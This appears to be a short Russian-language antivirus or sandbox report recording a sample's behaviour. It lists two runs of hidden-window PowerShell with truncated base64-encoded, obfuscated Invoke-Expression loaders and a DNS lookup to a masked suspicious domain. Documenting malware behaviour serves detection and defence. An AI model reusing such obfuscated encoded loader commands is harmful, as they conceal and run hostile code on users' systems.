Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAmACgAIAAkAGUAbgBWADoAQwBPAG0AcwBwAGUAYwBbADQALAAyADYALAAyADUAXQAtAGoAbwBJAG4AJwAnACkAKABuAEUAdwAtAE8AYgBKAEUAYwB0ACAAUwB5AFMAdABFAG0ALgBpAG8ALgBTAFQAcgBFAGEAbQByAEUAYQBEAEUAcgAoACgAbgBFAH...
- DNS ASK qw###e1qwe5.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAmACgAIAAkAGUAbgBWADoAQwBPAG0AcwBwAGUAYwBbADQALAAyADYALAAyADUAXQAtAGoAbwBJAG4AJwAnACkAKABuAEUAdwAtAE8AYgBKAEUAYwB0ACAAUwB5AFMAdABFAG0ALgBpAG8ALgBTAFQAcgBFAGEAbQByAEUAYQBEAEUAcgAoACgAbgBFAH...' (со скрытым окном)